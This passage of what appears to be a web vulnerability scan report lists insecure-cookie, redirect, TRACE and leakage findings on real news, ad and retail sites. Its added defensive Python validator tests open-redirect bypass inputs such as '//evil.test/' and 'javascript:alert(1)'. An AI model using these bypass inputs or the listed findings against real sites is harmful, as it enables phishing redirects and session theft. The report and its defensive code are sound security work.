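Every entry in section 9 is a redirector that sends the browser wherever a url, rurl or REST path segment says. The fix is not a blacklist of bad hosts but an exact allow-list, applied after the normalisations browsers perform. The Python below is an added example written for this page, not code from the report or from any of the listed operators; is_safe_redirect accepts only an absolute path or a URL whose host is exactly on the allow-list, and rejects the usual bypasses (protocol-relative //host, backslashes, embedded tabs, user@host, look-alike suffixes, javascript: and other schemes). The hosts example.test and evil.test are constructed.

```python
import re
from typing import FrozenSet
from urllib.parse import urlsplit


def is_safe_redirect(target: str, allowed_hosts: FrozenSet[str]) -> bool:
    """Return True only for a same-site redirect target.

    Accepts absolute paths ('/account') and absolute URLs whose host is
    exactly in allowed_hosts. Rejects protocol-relative '//evil', backslash
    and tab/newline variants that browsers normalise, 'user@host' confusion,
    look-alike hosts, and non-http schemes."""
    if not target:
        return False
    # Browsers drop tabs and newlines anywhere in a URL and treat '\' as '/'.
    t = re.sub(r"[\t\r\n]", "", target).strip().replace("\\", "/")
    if t.startswith("//"):          # also covers '///evil', which urlsplit
        return False                # would report as a host-less path
    parts = urlsplit(t)
    if parts.scheme and parts.scheme.lower() not in ("http", "https"):
        return False                # javascript:, data:, etc.
    if parts.netloc:
        host = (parts.hostname or "").lower()   # userinfo and port removed
        return host in allowed_hosts            # exact match, no suffix test
    # No host: only an absolute path on this site is acceptable.
    return t.startswith("/")


def safe_redirect_target(target: str, allowed_hosts: FrozenSet[str],
                         fallback: str = "/") -> str:
    """What a redirector endpoint should emit as Location: the validated
    target, otherwise a fixed local fallback."""
    return target if is_safe_redirect(target, allowed_hosts) else fallback


ALLOWED_HOSTS = frozenset({"www.example.test"})  # constructed allow-list

if __name__ == "__main__":
    for t in ("/account", "https://www.example.test/deals", "//evil.test/",
              "/\\evil.test", "https://www.example.test@evil.test/",
              "https://www.example.test.evil.test/", "javascript:alert(1)"):
        print(f"{t!r:45} -> {safe_redirect_target(t, ALLOWED_HOSTS)}")
```

For the adsafeprotected entry (9.2) the redirect target is a REST path segment rather than a query parameter; the check is the same, with the segment treated as the host and compared exactly against the allow-list. Where a third-party redirector genuinely has to forward to arbitrary advertiser sites, the usual mitigation is a signed or server-side-resolved campaign id in place of a free-form URL.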

10. Cookie scoped to parent domain

10.1. http://api.twitter.com/1/wvuefox8/lists/wvue-fox-8-3/statuses.json

10.2. http://t.mookie1.com/t/v1/imp

10.3. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

10.4. http://a1.interclick.com/ColDta.aspx

10.5. http://ad.amgdgt.com/ads/

10.6. http://ad.doubleclick.net/clk

10.7. http://ads.pointroll.com/PortalServe/

10.8. http://ads.revsci.net/adserver/ako

10.9. http://ads.revsci.net/adserver/ako

10.10. http://amch.questionmarket.com/adsc/d887938/3/500004862365/decide.php

10.11. http://ar.voicefive.com/b/wc_beacon.pli

10.12. http://ar.voicefive.com/bmx3/broker.pli

10.13. http://at.amgdgt.com/ads/

10.14. http://b.scorecardresearch.com/b

10.15. http://b.scorecardresearch.com/p

10.16. http://b.voicefive.com/b

10.17. http://bh.contextweb.com/bh/rtset

10.18. http://bidder.mathtag.com/iframe/notify

10.19. http://bs.serving-sys.com/BurstingPipe/adServer.bs

10.20. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js

10.21. http://ds.addthis.com/red/psi/sites/www.fox8live.com/p.json

10.22. http://ib.adnxs.com/ab

10.23. http://ib.adnxs.com/acb

10.24. http://ib.adnxs.com/getuid

10.25. http://ib.adnxs.com/ptj

10.26. http://ib.adnxs.com/ptj

10.27. http://ib.adnxs.com/ptj

10.28. http://ib.adnxs.com/seg

10.29. http://idcs.interclick.com/Segment.aspx

10.30. http://image2.pubmatic.com/AdServer/Pug

10.31. http://leadback.advertising.com/adcedge/lb

10.32. http://map.media6degrees.com/orbserv/hbpix

10.33. http://odb.outbrain.com/utils/get

10.34. http://odb.outbrain.com/utils/get

10.35. http://odb.outbrain.com/utils/ping.html

10.36. http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html

10.37. http://pix04.revsci.net/D08734/a1/0/3/0.js

10.38. http://pix04.revsci.net/J06575/a4/0/0/pcx.js

10.39. http://pix04.revsci.net/J06575/b3/0/3/1003161/235941171.js

10.40. http://pix04.revsci.net/J06575/b3/0/3/1003161/498787488.js

10.41. http://pix04.revsci.net/J06575/b3/0/3/1003161/807655569.js

10.42. http://r.openx.net/set

10.43. http://r1-ads.ace.advertising.com/site=786652/size=728090/u=2/bnum=46632794/hr=10/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.usatoday.com%252Fweather%252Ffloods%252F2011-05-02-ohio-mississippi-river-floods_n.htm

10.44. http://segment-pixel.invitemedia.com/pixel

10.45. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6544434

10.46. http://sitelife.usatoday.com/ver1.0/Stats/Tracker.gif

10.47. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app

10.48. http://sitelife.usatoday.com/ver1.0/usat/pluck/comments/comments.js

10.49. http://sitelife.usatoday.com/ver1.0/usat/pluck/pluck.js

10.50. http://syndication.mmismm.com/tntwo.php

10.51. http://tacoda.at.atwola.com/rtx/r.js

10.52. http://tags.bluekai.com/site/3775

10.53. http://tags.bluekai.com/site/3869

10.54. http://trgc.opt.fimserve.com/fp.gif

10.55. http://trgca.opt.fimserve.com/fp.gif

10.56. http://va.px.invitemedia.com/adnxs_imp

10.57. http://www.groupon.com/dallas/

10.58. http://www.groupon.com/learn

10.59. http://www.groupon.com/mobile

10.60. http://www.groupon.com/privacy

10.61. http://www.groupon.com/subscriptions/new

10.62. https://www.groupon.com/dallas/

10.63. https://www.groupon.com/learn

10.64. https://www.groupon.com/login

10.65. https://www.groupon.com/mobile

10.66. https://www.groupon.com/users

10.67. https://www.groupon.com/users/new

10.68. http://www.tinbuadserv.com/v3/serve.php
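Sections 6, 10 and 11 are three views of the same Set-Cookie headers: no Secure attribute on a cookie issued over https, a Domain attribute set to a parent of the issuing host, and no HttpOnly attribute. The Python below is an added example written for this page, not code from the report's authors or the scanner; it parses Set-Cookie values and returns, for each cookie, the same finding names the index uses, so a response can be triaged offline from a saved header list. The sample headers and the host example.test are constructed.

```python
from typing import Dict, List, Union

Attr = Union[str, bool]


def parse_set_cookie(header_value: str) -> Dict[str, Attr]:
    """Split 'name=value; Attr; Attr=val' into a dict: 'name', 'value', and
    lower-cased attribute keys (flag attributes such as Secure map to True)."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    cookie: Dict[str, Attr] = {"name": name.strip(), "value": value.strip()}
    for attr in parts[1:]:
        if not attr:
            continue
        key, _, val = attr.partition("=")
        cookie[key.strip().lower()] = val.strip() if val else True
    return cookie


def audit_cookie(header_value: str, request_host: str, over_tls: bool) -> List[str]:
    """Return the report's own finding names that apply to one Set-Cookie."""
    c = parse_set_cookie(header_value)
    issues = []
    if over_tls and c.get("secure") is not True:
        issues.append("SSL cookie without secure flag set")
    if c.get("httponly") is not True:
        issues.append("Cookie without HttpOnly flag set")
    domain = c.get("domain")
    if isinstance(domain, str):
        parent = domain.lstrip(".").lower()
        host = request_host.lower()
        # Domain=example.test set by www.example.test is sent to every
        # *.example.test host, not just the one that issued it.
        if parent != host and host.endswith("." + parent):
            issues.append("Cookie scoped to parent domain")
    return issues


def audit_response(set_cookie_headers: List[str], request_host: str,
                   over_tls: bool) -> Dict[str, List[str]]:
    """Audit every Set-Cookie of one response; cookies with no issues are
    omitted so the result reads like the report's index."""
    result: Dict[str, List[str]] = {}
    for header in set_cookie_headers:
        issues = audit_cookie(header, request_host, over_tls)
        if issues:
            result[str(parse_set_cookie(header)["name"])] = issues
    return result


# Constructed sample headers, not captured from any host in the report.
SAMPLE_SET_COOKIES = [
    "sid=abc123; Path=/; Domain=.example.test",
    "pref=dark; Path=/; Secure; HttpOnly",
    "track=xyz; Expires=Wed, 09 May 2012 10:47:30 GMT; Path=/; HttpOnly",
]

if __name__ == "__main__":
    for name, issues in audit_response(SAMPLE_SET_COOKIES, "www.example.test", True).items():
        print(name, "->", "; ".join(issues))
```

Severity depends on what the cookie carries. On the ad and measurement hosts that dominate sections 10 and 11 the cookie is a tracking identifier and the findings are informational. On the shop, login and account endpoints (shop.npr.org, the groupon.com login and users pages) the same attributes protect a session: missing Secure lets the token leak over any plain-http request to the host, missing HttpOnly lets the reflected XSS in section 2 read it, and a parent-domain scope lets every sibling host, including any with its own XSS, read it too.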

11. Cookie without HttpOnly flag set

11.1. http://ads.adxpose.com/ads/ads.js

11.2. http://beacon-1.newrelic.com/1/fffa2293e6

11.3. http://event.adxpose.com/event.flow

11.4. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

11.5. http://shop.npr.org/

11.6. https://shop.npr.org/index.php

11.7. http://t.mookie1.com/t/v1/imp

11.8. http://trc.taboolasyndication.com/usatoday/trc/2/json

11.9. http://widgets.macroaxis.com/widgets/content.jsp

11.10. http://www.macroaxis.com/widgets/url.jsp

11.11. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

11.12. http://a1.interclick.com/ColDta.aspx

11.13. http://a1.interclick.com/getInPageJSProcess.aspx

11.14. http://ad.amgdgt.com/ads/

11.15. http://ad.doubleclick.net/clk

11.16. http://ad.yieldmanager.com/pixel

11.17. http://ads.bridgetrack.com/a/f/

11.18. http://ads.pointroll.com/PortalServe/

11.19. http://ads.revsci.net/adserver/ako

11.20. http://ads.revsci.net/adserver/ako

11.21. http://amch.questionmarket.com/adsc/d887938/3/500004862365/decide.php

11.22. http://api.twitter.com/1/wvuefox8/lists/wvue-fox-8-3/statuses.json

11.23. http://ar.voicefive.com/b/wc_beacon.pli

11.24. http://ar.voicefive.com/bmx3/broker.pli

11.25. http://at.amgdgt.com/ads/

11.26. http://atd.agencytradingdesk.net/WatsonTracker/IMP/A1000138/C1000187/P1003017/pixel.gif

11.27. http://b.scorecardresearch.com/b

11.28. http://b.scorecardresearch.com/p

11.29. http://b.voicefive.com/b

11.30. http://bh.contextweb.com/bh/rtset

11.31. http://bidder.mathtag.com/iframe/notify

11.32. http://bs.serving-sys.com/BurstingPipe/adServer.bs

11.33. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js

11.34. http://ds.addthis.com/red/psi/sites/www.fox8live.com/p.json

11.35. http://idcs.interclick.com/Segment.aspx

11.36. http://image2.pubmatic.com/AdServer/Pug

11.37. http://leadback.advertising.com/adcedge/lb

11.38. http://map.media6degrees.com/orbserv/hbpix

11.39. http://odb.outbrain.com/utils/get

11.40. http://odb.outbrain.com/utils/get

11.41. http://odb.outbrain.com/utils/ping.html

11.42. http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html

11.43. http://pix04.revsci.net/D08734/a1/0/3/0.js

11.44. http://pix04.revsci.net/J06575/a4/0/0/pcx.js

11.45. http://pix04.revsci.net/J06575/b3/0/3/1003161/235941171.js

11.46. http://pix04.revsci.net/J06575/b3/0/3/1003161/498787488.js

11.47. http://pix04.revsci.net/J06575/b3/0/3/1003161/807655569.js

11.48. http://r.openx.net/set

11.49. http://r1-ads.ace.advertising.com/site=786652/size=728090/u=2/bnum=46632794/hr=10/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.usatoday.com%252Fweather%252Ffloods%252F2011-05-02-ohio-mississippi-river-floods_n.htm

11.50. http://segment-pixel.invitemedia.com/pixel

11.51. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6544434

11.52. http://sitelife.usatoday.com/ver1.0/Content/images/no-user-image.gif

11.53. http://sitelife.usatoday.com/ver1.0/Content/images/store/0/4/10516936-900e-4800-949f-6bf88e9054a7.P4Avatar.jpg

11.54. http://sitelife.usatoday.com/ver1.0/Content/images/store/0/6/409d4e2c-128c-4123-962d-2682bb7c58c3.P4Avatar.gif

11.55. http://sitelife.usatoday.com/ver1.0/Content/images/store/12/3/0c59ddcb-14b2-4a24-83ef-b67cd107c524.P4Avatar.jpg

11.56. http://sitelife.usatoday.com/ver1.0/Content/images/store/13/12/7db8438d-87d0-417f-bc4a-8ae8beafb554.P4Avatar.jpg

11.57. http://sitelife.usatoday.com/ver1.0/Content/images/store/2/8/22005321-8ed2-4f70-a8ee-77647e52878f.P4Avatar.gif

11.58. http://sitelife.usatoday.com/ver1.0/Content/images/store/8/4/78dbe245-8052-454f-8454-f58c95181887.P4Avatar.bmp

11.59. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-action-buttons.png

11.60. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-background.png

11.61. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-reply-arrow-hide.gif

11.62. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-reply-arrow-show.gif

11.63. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-rss-button.gif

11.64. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-avatar-blocked.gif

11.65. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-avatar-default.gif

11.66. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-bg-2.jpg

11.67. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-bg.jpg

11.68. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-last-bg.png

11.69. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-next-bg.png

11.70. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-primary-button-left.png

11.71. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-primary-button-right.png

11.72. http://sitelife.usatoday.com/ver1.0/Content/ua/images/reactions/abuse/pluck-abuse-report-icon.gif

11.73. http://sitelife.usatoday.com/ver1.0/Content/ua/images/reactions/abuse/pluck-abuse-reported-icon.gif

11.74. http://sitelife.usatoday.com/ver1.0/Content/ua/images/reactions/score/pluck-thumb-up-grayed.gif

11.75. http://sitelife.usatoday.com/ver1.0/Content/ua/images/throbber.gif

11.76. http://sitelife.usatoday.com/ver1.0/Content/ua/images/throbber_circle.gif

11.77. http://sitelife.usatoday.com/ver1.0/Content/ua/images/users/pluck-recommend-user-icon.gif

11.78. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/email/pluck-email-icon.gif

11.79. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/permalink/pluck-permalink-icon.gif

11.80. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-buzz.gif

11.81. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-delicious.gif

11.82. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-digg.gif

11.83. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-fb.gif

11.84. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-ff.gif

11.85. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-linkedin.gif

11.86. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-myspace.gif

11.87. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-reddit.gif

11.88. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-slashdot.gif

11.89. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-stumble.gif

11.90. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-tumblr.gif

11.91. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-tweet.gif

11.92. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/checkplayer.js

11.93. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/flXHR.js

11.94. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/flensed.js

11.95. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/jquery.flXHRproxy.js

11.96. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/jquery.xhr.js

11.97. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/swfobject.js

11.98. http://sitelife.usatoday.com/ver1.0/Stats/Tracker.gif

11.99. http://sitelife.usatoday.com/ver1.0/content/ua/css/pluckAll.css

11.100. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app

11.101. http://sitelife.usatoday.com/ver1.0/usat/pluck/comments/comments.js

11.102. http://sitelife.usatoday.com/ver1.0/usat/pluck/pluck.js

11.103. http://syndication.mmismm.com/tntwo.php

11.104. http://tacoda.at.atwola.com/rtx/r.js

11.105. http://tags.bluekai.com/site/3775

11.106. http://tags.bluekai.com/site/3869

11.107. http://trc.taboolasyndication.com/usatoday/log/2/visible

11.108. http://trgc.opt.fimserve.com/fp.gif

11.109. http://trgca.opt.fimserve.com/fp.gif

11.110. http://va.px.invitemedia.com/adnxs_imp

11.111. http://www.groupon.com/dallas/

11.112. http://www.groupon.com/learn

11.113. http://www.groupon.com/mobile

11.114. http://www.groupon.com/privacy

11.115. http://www.groupon.com/subscriptions/new

11.116. https://www.groupon.com/dallas/

11.117. https://www.groupon.com/learn

11.118. https://www.groupon.com/login

11.119. https://www.groupon.com/mobile

11.120. https://www.groupon.com/users

11.121. https://www.groupon.com/users/new

11.122. http://www.hnedata.net/features/tr_stock_charts

11.123. http://www.tinbuadserv.com/v3/serve.php

12. Password field with autocomplete enabled

12.1. http://shop.npr.org/index.php

12.2. https://www.groupon.com/login

12.3. https://www.groupon.com/users/new

12.4. http://www.npr.org/templates/reg/

12.5. http://www.npr.org/templates/reg/login.php

12.6. http://www.therepublic.com/login/

12.7. http://www.therepublic.com/login/register/

13. Source code disclosure

13.1. http://assets1.grouponcdn.com/assets/application.js

13.2. http://assets1.grouponcdn.com/assets/subscriptions.js

14. ASP.NET debugging enabled

15. Referer-dependent response

15.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

15.2. http://480-adver-view.c3metrics.com/v.js

15.3. http://api.twitter.com/1/wvuefox8/lists/wvue-fox-8-3/statuses.json

15.4. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

15.5. http://jqueryui.com/ui/jquery.ui.widget.js

15.6. http://www.facebook.com/plugins/like.php

15.7. http://www.facebook.com/plugins/recommendations.php

15.8. http://www.fox8live.com/mostpopular/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx

15.9. https://www.groupon.com/users

16. Cross-domain POST

16.1. http://radar.weather.gov/Conus/index.php

16.2. http://radar.weather.gov/radar.php

16.3. http://www.csmonitor.com/Business

16.4. http://www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down

17. Cross-domain Referer leakage

17.1. http://ad.amgdgt.com/ads/

17.2. http://ad.amgdgt.com/ads/

17.3. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10

17.4. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136

17.5. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8

17.6. http://ad.doubleclick.net/adj/N2883.6441.USATODAY.COM/B5327539.11

17.7. http://ad.doubleclick.net/adj/N3175.128132.INTERCLICK/B4640114.15

17.8. http://ad.doubleclick.net/adj/invc.macroaxis/widget

17.9. http://ads.bridgetrack.com/a/f/

17.10. http://ads.pointroll.com/PortalServe/

17.11. http://ads.pointroll.com/PortalServe/

17.12. http://ads.pointroll.com/PortalServe/

17.13. http://ads.pointroll.com/PortalServe/

17.14. http://bidder.mathtag.com/iframe/notify

17.15. http://bidder.mathtag.com/iframe/notify

17.16. http://choices.truste.com/ca

17.17. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js

17.18. http://finance.fox8live.com/inergize.wvue

17.19. http://fls.doubleclick.net/activityi

17.20. http://gannett.gcion.com/addyn/3.0/5111.1/778079/0/-1/ADTECH

17.21. http://gannett.gcion.com/addyn/3.0/5111.1/778079/0/-1/ADTECH

17.22. http://gannett.gcion.com/addyn/3.0/5111.1/778079/0/-1/ADTECH

17.23. http://googleads.g.doubleclick.net/pagead/ads

17.24. http://ib.adnxs.com/ptj

17.25. http://ib.adnxs.com/ptj

17.26. http://login.npr.org/openid/embed

17.27. http://radar.weather.gov/radar.php

17.28. http://shop.npr.org/

17.29. http://widgets.macroaxis.com/widgets/partnerMarketsIntradaySnap.jsp

17.30. http://wvue.web.entriq.net/nw/dpm/loadplayer/

17.31. http://www.facebook.com/plugins/like.php

17.32. http://www.facebook.com/plugins/recommendations.php

17.33. http://www.groupon.com/subscriptions/new

17.34. http://www.groupon.com/subscriptions/new

17.35. http://www.srh.noaa.gov/lmrfc/

18. Cross-domain script include

18.1. http://ad.amgdgt.com/ads/

18.2. http://ad.amgdgt.com/ads/

18.3. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10

18.4. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136

18.5. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8

18.6. http://bidder.mathtag.com/iframe/notify

18.7. http://bidder.mathtag.com/iframe/notify

18.8. http://content.usatoday.com/topics/reporter/Doyle+Rice

18.9. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js

18.10. http://finance.fox8live.com/inergize.wvue

18.11. http://googleads.g.doubleclick.net/pagead/ads

18.12. http://ib.adnxs.com/ptj

18.13. http://login.npr.org/openid/embed

18.14. http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html

18.15. http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html

18.16. http://r1-ads.ace.advertising.com/site=786652/size=728090/u=2/bnum=46632794/hr=10/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.usatoday.com%252Fweather%252Ffloods%252F2011-05-02-ohio-mississippi-river-floods_n.htm

18.17. http://shop.npr.org/

18.18. http://shop.npr.org/spoken-word/npr-american-chronicles-the-civil-war/

18.19. http://widget.newsinc.com/_fw/therepublic/toppicks_republic_ent.html

18.20. http://widget.newsinc.com/_fw/therepublic/toppicks_republic_lif.html

18.21. http://widget.newsinc.com/_fw/therepublic/toppicks_republic_spt.html

18.22. http://widget.newsinc.com/_fw/therepublic/toppicks_republic_wld.html

18.23. http://widgets.macroaxis.com/widgets/partnerMarketsIntradaySnap.jsp

18.24. http://www.csmonitor.com/Business

18.25. http://www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down

18.26. http://www.facebook.com/plugins/like.php

18.27. http://www.facebook.com/plugins/recommendations.php

18.28. http://www.fox8live.com/business/default.aspx

18.29. http://www.fox8live.com/business/iframe_financialticker.aspx

18.30. http://www.fox8live.com/business/iframe_indexwatch.aspx

18.31. http://www.fox8live.com/content/aboutus/default.aspx

18.32. http://www.fox8live.com/content/news/lee_zurik_investigation/default.aspx

18.33. http://www.fox8live.com/content/news/seregni/default.aspx

18.34. http://www.fox8live.com/content/news/watercooler/default.aspx

18.35. http://www.fox8live.com/default.aspx

18.36. http://www.fox8live.com/entertainment/horoscopes/default.aspx

18.37. http://www.fox8live.com/mostpopular/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx

18.38. http://www.fox8live.com/news/local/story/St-Bernard-prepares-for-rising-Mississippi-River/vJUO9a9n60iNAXZ6QCm2oQ.cspx

18.39. http://www.fox8live.com/rss/default.aspx

18.40. http://www.fox8live.com/wireless/default.aspx

18.41. http://www.groupon.com/learn

18.42. http://www.groupon.com/mobile

18.43. http://www.groupon.com/privacy

18.44. http://www.groupon.com/rounded_bottom.png

18.45. http://www.groupon.com/subscriptions/new

18.46. https://www.groupon.com/login

18.47. https://www.groupon.com/users/new

18.48. http://www.hnedata.net/features/tr_stock_charts

18.49. http://www.natchezdemocrat.com/

18.50. http://www.therepublic.com/home/

18.51. http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm

19. TRACE method is enabled

19.1. http://amch.questionmarket.com/

19.2. http://bh.contextweb.com/

19.3. http://cdn.taboolasyndication.com/

19.4. http://chart.financialcontent.com/

19.5. http://image2.pubmatic.com/

19.6. http://matcher-apx.bidder7.mookie1.com/

19.7. http://matcher.bidder7.mookie1.com/

19.8. http://matcher.bidder8.mookie1.com/

19.9. http://metrics.csmonitor.com/

19.10. http://metrics.npr.org/

19.11. http://optimized-by.rubiconproject.com/

19.12. http://r.openx.net/

19.13. http://secure-us.imrworldwide.com/

19.14. http://t.mookie1.com/

19.15. http://tacoda.at.atwola.com/

19.16. http://tracker.bidder7.mookie1.com/

19.17. http://tracker.financialcontent.com/

19.18. http://trc.taboolasyndication.com/

19.19. http://usatoday1.112.2o7.net/

19.20. http://widgets.outbrain.com/

19.21. http://wvue.web.entriq.net/

19.22. http://www.collegesurfing.com/

19.23. http://www.npr.org/

19.24. http://www.srh.noaa.gov/

19.25. http://www.tinbuadserv.com/

20. Email addresses disclosed

20.1. http://radar.weather.gov/Conus/index.php

20.2. http://radar.weather.gov/radar.php

20.3. http://s.meebocdn.net/cim/script/cim_v92_cim_11_8_0.en.js

20.4. http://shop.npr.org/content/vendors/jquery/rater/jquery.rater-custom.js

20.5. http://www.fox8live.com/business/default.aspx

20.6. http://www.fox8live.com/content/aboutus/default.aspx

20.7. http://www.fox8live.com/content/news/lee_zurik_investigation/default.aspx

20.8. http://www.fox8live.com/content/news/seregni/default.aspx

20.9. http://www.fox8live.com/content/news/watercooler/default.aspx

20.10. http://www.fox8live.com/default.aspx

20.11. http://www.fox8live.com/mostpopular/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx

20.12. http://www.fox8live.com/news/local/story/St-Bernard-prepares-for-rising-Mississippi-River/vJUO9a9n60iNAXZ6QCm2oQ.cspx

20.13. http://www.fox8live.com/wireless/default.aspx

20.14. http://www.groupon.com/privacy

20.15. https://www.groupon.com/login

20.16. http://www.macroaxis.com/widgets/url.jsp

20.17. http://www.natchezdemocrat.com/

20.18. http://www.npr.org/templates/javascript/generated/regPage.js

20.19. http://www.srh.noaa.gov/cte.htm

20.20. http://www.srh.noaa.gov/lmrfc/

20.21. http://www.srh.noaa.gov/lmrfc/quickbrief.php

20.22. http://www.srh.noaa.gov/srh.htm

20.23. http://www.therepublic.com/assets/gzip.php

20.24. http://www.therepublic.com/assets/scripts/menu/menu.js

20.25. http://www.therepublic.com/home/

20.26. http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm

21. Private IP addresses disclosed

21.1. http://static.ak.fbcdn.net/connect/xd_proxy.php

21.2. http://static.ak.fbcdn.net/rsrc.php/v1/zD/r/B4K_BWwP7P5.png

21.3. http://static.ak.fbcdn.net/rsrc.php/v1/ze/r/nZW4C56WJb6.png

21.4. http://www.facebook.com/extern/login_status.php

21.5. http://www.facebook.com/extern/login_status.php

21.6. http://www.facebook.com/extern/login_status.php

21.7. http://www.facebook.com/plugins/like.php

21.8. http://www.facebook.com/plugins/like.php

21.9. http://www.facebook.com/plugins/like.php

21.10. http://www.facebook.com/plugins/like.php

21.11. http://www.facebook.com/plugins/like.php

21.12. http://www.facebook.com/plugins/like.php

21.13. http://www.facebook.com/plugins/like.php

21.14. http://www.facebook.com/plugins/like.php

21.15. http://www.facebook.com/plugins/like.php

21.16. http://www.facebook.com/plugins/like.php

21.17. http://www.facebook.com/plugins/like.php

21.18. http://www.facebook.com/plugins/like.php

21.19. http://www.facebook.com/plugins/like.php

21.20. http://www.facebook.com/plugins/like.php

21.21. http://www.facebook.com/plugins/like.php

21.22. http://www.facebook.com/plugins/like.php

21.23. http://www.facebook.com/plugins/like.php

21.24. http://www.facebook.com/plugins/like.php

21.25. http://www.facebook.com/plugins/like.php

21.26. http://www.facebook.com/plugins/like.php

21.27. http://www.facebook.com/plugins/like.php

21.28. http://www.facebook.com/plugins/recommendations.php

21.29. http://www.facebook.com/plugins/recommendations.php

21.30. http://www.facebook.com/plugins/recommendations.php

22. Robots.txt file

22.1. http://ad.amgdgt.com/ads/

22.2. http://ad.doubleclick.net/pfadx/csmonitor_cim/

22.3. http://ads.pointroll.com/PortalServe/

22.4. http://amch.questionmarket.com/adscgen/sta.php

22.5. http://api.twitter.com/1/wvuefox8/lists/wvue-fox-8-3/statuses.json

22.6. http://assets1.grouponcdn.com/stylesheets/app/subscriptions/subscribe_2s208.css

22.7. http://at.amgdgt.com/ads/

22.8. http://atd.agencytradingdesk.net/WatsonTracker/IMP/A1000138/C1000187/P1003017/pixel.gif

22.9. http://b.scorecardresearch.com/b

22.10. http://b.voicefive.com/b

22.11. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90

22.12. http://bidder.mathtag.com/iframe/notify

22.13. http://bs.serving-sys.com/BurstingPipe/adServer.bs

22.14. http://cache-01.cleanprint.net/cp/psj

22.15. http://content.usatoday.com/apps/insidepage/crc.ashx

22.16. http://contextweb.usatoday.net/asp/Context/ContextWebHandler.ashx

22.17. http://d7.zedo.com/bar/v16-406/d3/jsc/fm.js

22.18. http://data.usatoday.net/apps/InsidePage

22.19. http://ds.serving-sys.com/BurstingCachedScripts//SBTemplates_2_3_0/StdBannerEx.js

22.20. http://fls.doubleclick.net/activityi

22.21. http://gannett.gcion.com/addyn/3.0/5111.1/809057/0/-1/ADTECH

22.22. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1030881291/

